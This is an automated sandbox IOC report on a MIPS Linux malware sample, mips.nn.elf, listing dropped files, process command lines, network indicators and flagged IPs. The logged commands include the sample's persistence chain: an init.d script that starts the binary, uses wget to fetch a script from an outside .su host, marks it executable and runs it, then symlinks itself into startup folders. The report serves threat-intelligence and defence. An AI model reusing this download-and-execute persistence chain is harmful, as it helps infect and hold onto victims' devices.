IOC Report
mips.nn.elf


Files

File Path | Type | Category | Malicious
mips.nn.elf | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mips.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.XqNobR (deleted) | ASCII text, with no line terminators | dropped | -
/tmp/qemu-open.c2m2lS (deleted) | ASCII text | dropped | -

Processes

Path | Cmdline | Malicious
/tmp/mips.nn.elf | /tmp/mips.nn.elf | -
/tmp/mips.nn.elf | - | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/systemctl | systemctl enable custom.service | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mybinary | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf" | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mips.nn.elf | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/mkdir | mkdir -p /etc/rc.d | -
/tmp/mips.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf | -
/tmp/mips.nn.elf | - | -
/usr/libexec/gnome-session-binary | - | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | -
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | -
/usr/lib/systemd/systemd | - | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | -

URLs

Name | IP | Malicious
http://pen.gorillafirewall.su/ | unknown | -

Domains

Name | IP | Malicious
daisy.ubuntu.com | 162.213.35.25 | -

IPs

IP | Domain | Country | Malicious
154.216.17.220 | unknown | Seychelles | malicious
91.92.246.113 | unknown | Bulgaria | malicious
93.123.85.166 | unknown | Bulgaria | malicious
45.202.35.64 | unknown | Seychelles | -

Memdumps

Base Address | Regiontype | Protect | Malicious